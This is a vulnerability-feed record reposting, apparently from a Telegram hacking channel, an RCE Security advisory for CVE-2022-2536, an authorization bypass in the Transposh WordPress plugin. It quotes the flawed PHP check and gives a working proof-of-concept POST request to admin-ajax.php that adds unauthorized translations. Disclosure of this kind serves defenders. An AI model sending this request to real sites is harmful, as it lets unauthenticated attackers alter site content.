{"uuid": "48a12245-2553-4014-a296-eb4b8c820017", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-2536", "type": "seen", "source": "https://t.me/hacking_Attack/66067", "content": "Exploit Collector\nTransposh WordPress Translation 1.0.8.1 Incorrect Authorization\n\nhttps://2.bp.blogspot.com/-trS7d3JOSJY/WWlvYoSx4fI/AAAAAAAAIOo/ua-jTrS9avcHrliD3JJHs9ifWyf14eAUwCLcBGAs/s1600/h57.png \nTransposh WordPress Translation versions 1.0.8.1 and below suffer from an incorrect authorization vulnerability.\n\nSHA-256 | cf075b58a8a1c31fce95fca535703432ed02017dc8456967462b1e93044c2dcc\n\nDownload\nRCE Security Advisory\nhttps://www.rcesecurity.com\n1. ADVISORY INFORMATION\n=======================\nProduct:        Transposh WordPress Translation\nVendor URL:     https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/\nType:           Incorrect Authorization [CWE-863]\nDate found:     2022-07-23\nDate published: 2022-08-16\nCVSSv3 Score:   7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)\nCVE:            CVE-2022-2536\n2. CREDITS\n==========\nThis vulnerability was discovered and researched by Julien Ahrens from\nRCE Security.\n3. VERSIONS AFFECTED\n====================\nTransposh WordPress Translation 1.0.8.1 and below\n4. INTRODUCTION\n===============\nTransposh translation filter for WordPress offers a unique approach to blog\ntranslation. It allows your blog to combine automatic translation with human\ntranslation aided by your users with an easy to use in-context interface.\n\n(from the vendor's homepage)\n5. VULNERABILITY DETAILS\n========================\nWhen installed, Transposh comes with a set of pre-configured options; one of these\nis the \"Who can translate\" setting under the \"Settings\" tab. However, this option\nis ignored if Transposh has enabled its \"autotranslate\" feature (it's enabled by\ndefault) and the HTTP POST parameter \"sr0\" is larger than 0. This is caused by a\nfaulty validation in \"wp/transposh_db.php\":\n\nif (!$by &amp;&amp; !($all_editable &amp;&amp;\n($this-&gt;transposh-&gt;is_translator() || ($source &gt; 0 &amp;&amp; $this-&gt;transposh-&gt;options-&gt;enable_autotranslate)))) {\ntp_logger(\"Unauthorized translation attempt \" . $_SERVER['REMOTE_ADDR'], 1);\nheader(\"HTTP/1.0 401 Unauthorized translation\");\nexit;\n}\n\nSuccessful exploits can allow an unauthenticated attacker to bypass the Transposh\npermissions and add translations to the WordPress site, thereby influencing what\nis shown on the site. However, this only affects new translations.\n6. PROOF OF CONCEPT\n===================\nThe following Proof-of-Concept adds a new translation\n\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: [host]\nContent-Length: 74\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nUser-Agent: Mozilla/5.0\nConnection: close\n\naction=tp_translation&amp;ln0=en&amp;sr0=1&amp;items=1&amp;tk0=translation&amp;tr0=translation\n7. SOLUTION\n===========\nNone. Remove the plugin to prevent exploitation.\n8. REPORT TIMELINE\n==================\n2022-07-23: Discovery of the vulnerability\n2022-07-23: CVE requested from Wordfence (CNA)\n2022-07-25: Wordfence assigns CVE-2022-2536\n2022-08-09: Sent note to vendor\n2022-08-09: Vendor is aware of this bug, but there is no plan to fix it yet\n2022-08-16: Public Disclosure\n9. REFERENCES\n=============\nhttps://github.com/MrTuxracer/advisories\n\nSource:packetstormsecurity.com\n\n___________________________ \n@hacking_Attack\n@Hacking_Video", "creation_timestamp": "2026-09-01T20:01:25.950203Z"}